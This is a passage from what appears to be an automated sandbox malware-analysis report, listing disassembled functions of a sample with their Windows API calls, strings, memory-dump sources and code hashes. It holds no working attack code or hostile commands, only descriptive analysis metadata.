Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
wsprintfW.USER32 ref: 004067A4
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Strings

\, xrefs: 0040677A
UXTHEME, xrefs: 0040675B
%s%S.dll, xrefs: 0040679E

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

Function 73F91777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 73F91B5F: GlobalFree.KERNEL32(?), ref: 73F91DB2
Part of subcall function 73F91B5F: GlobalFree.KERNEL32(?), ref: 73F91DB7
Part of subcall function 73F91B5F: GlobalFree.KERNEL32(?), ref: 73F91DBC

GlobalFree.KERNEL32(00000000), ref: 73F91825
FreeLibrary.KERNEL32(?), ref: 73F918AB
GlobalFree.KERNEL32(00000000), ref: 73F918D0

Part of subcall function 73F92352: GlobalAlloc.KERNEL32(00000040,?), ref: 73F92383

Part of subcall function 73F92724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73F917F6,00000000), ref: 73F927F4

Part of subcall function 73F915C6: wsprintfW.USER32 ref: 73F915F4

Strings

, xrefs: 73F918B1

Memory Dump Source

Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true

Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 63ceba952bed29c64fd1ecd6cc29df0f350816648b4c0ee6df8267b4c25c3f3b
Instruction ID: 489116b15aa464f7f22cc9163d1fec1fa43ef72965f0704ac661ebd2598259b6
Opcode Fuzzy Hash: 63ceba952bed29c64fd1ecd6cc29df0f350816648b4c0ee6df8267b4c25c3f3b
Instruction Fuzzy Hash: C34193B250070AEFFB119F649E84B9537ECBB043D0F1945B5E90BEA1D6DB788044DB68

Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz9A57.tmp,00000023,00000011,00000002), ref: 0040242F
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp,00000000,00000011,00000002), ref: 0040246F
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp,00000000,00000011,00000002), ref: 00402557

Strings

C:\Users\user\AppData\Local\Temp\nsz9A57.tmp, xrefs: 00402420, 0040242E, 00402445, 00402459, 00402464

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsz9A57.tmp
API String ID: 2655323295-2574335292
Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

Function 00405F0D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405F2B
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF), ref: 00405F46

Strings

nsa, xrefs: 00405F1A
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F12, 00405F16

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1968954121
Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
GetLastError.KERNEL32 ref: 00405976
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
GetLastError.KERNEL32 ref: 00405995

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004053F3
CallWindowProcW.USER32(?,?,?,?), ref: 00405444

Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD

Strings

, xrefs: 004053D4

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E

Function 004062B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307

Strings

Call, xrefs: 004062BD

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4

Function 00406F27 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45

Function 00407128 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45

Function 00406E3E Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45

Function 00406943 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45

Function 00406D91 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45

Function 00406EAF Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45

Function 00406DFB Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45

Function 004032DE Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004032F2

Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
SetFilePointer.KERNELBASE(00175CFF,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D

Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB

Memory Dump Source

